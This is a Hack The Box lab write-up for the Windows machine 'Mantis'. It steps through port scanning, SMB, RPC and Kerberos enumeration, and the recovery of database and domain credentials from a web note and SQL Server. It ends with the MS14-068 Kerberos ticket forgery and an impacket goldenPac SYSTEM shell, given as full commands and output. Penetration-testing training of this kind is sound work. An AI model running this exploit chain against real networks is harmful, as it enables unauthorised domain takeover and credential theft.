HTB-Mantis (Hard)
Enumeration
Nmap
# Nmap 7.92 scan initiated Thu Jun 2 10:54:02 2022 as: nmap -sC -sV -oN nmap.out 10.129.92.59
Nmap scan report for 10.129.92.59
Host is up (0.37s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-02 15:13:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
|_ssl-date: 2022-06-02T15:14:55+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-02T14:55:22
|_Not valid after: 2052-06-02T14:55:22
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2022-06-02T11:14:41-04:00
| ms-sql-info:
| 10.129.92.59:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_clock-skew: mean: 48m01s, deviation: 1h47m22s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-06-02T15:14:40
|_ start_date: 2022-06-02T14:53:26
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 2 11:15:09 2022 -- 1 IP address (1 host up) scanned in 1267.81 seconds
Nmap found a lot of ports.
Port 445
SMB
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ smbmap -H 10.129.148.199
[+] IP: 10.129.148.199:445 Name: htb.local
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ smbclient -N -L //10.129.148.199
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.148.199 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableIt can authenticate anonymously but return no shares.
RPC
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ rpcclient -U '' -N 10.129.148.199
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $>rpcclient can also login with anonymous but when we query something, it display ACCESS_DENIED
Port 88 - Kerberos
User enumeration through kerbrute and we will get a couple of valid users
./kerbrute_linux_amd64 userenum --domain htb.local xato-net-10-million-usernames-dup.txt --dc 10.129.148.199Port 1337 IIS Web Server
nmap -p- -oN all-port-scan 10.129.148.199In full port scan, nmap display one more port which is 1337 running IIS webserver.
Bruteforcing with gobuster
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ gobuster dir -u http://10.129.148.199:1337/ -w ~/opt/directory-list-2.3-medium.txt -o gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
=============================================================== [+] Url: http://10.129.148.199:1337/
[+] Method: GET [+] Threads: 10
[+] Wordlist: /home/kali/opt/directory-list-2.3-medium.txt [+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/02 23:57:26 Starting gobuster in directory enumeration mode
===============================================================
/secure_notes (Status: 301)Found a directory called secure_notes.
Web.config returned 404 and we can view dev_notes .
Notice in url, there is a base64 encoded
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -ps -r
m$$ql_S@_P@ssW0rd!we will get mssql credential.
MSSQL login
┌──(kali㉿kali)-[~/opt]
└─$ impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> We can login with impacket-mssqlclient tool but database is large and it hard to dump all the data.Insert we can use GUI version called dbeaver.
Dumping James User
Found one credentials James:J@m3s_P@ssW0rd! .Now we can check with crackmapexec it valid or not.
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!'
SMB 10.129.148.199 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.148.199 445 MANTIS [+] htb.local\James:J@m3s_P@ssW0rd!It not showing Pwn3d which mean we can't execute through smb.
Connect RPC client
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>With these credential, we can also dump a list of ASP-REP vulnerable users with getnpuser tool
impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199But nothing found in this case. After some googling and found an article.
https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html
Generating Kerberos Ticket
Follow along in the blog, add dns in /etc/host , modified nameserver and run exploit.
python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!Copy ticket to /tmp
cp TGT_james@htb.local.ccache /tmp/krb5cc_0
Getting System
Getting a shell with GoldenPac impacket tool.
impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis' [224/384]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file nrzWOaoC.exe
[*] Opening SVCManager on mantis.....
[*] Creating service BGjw on mantis.....
[*] Starting service BGjw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Last updated
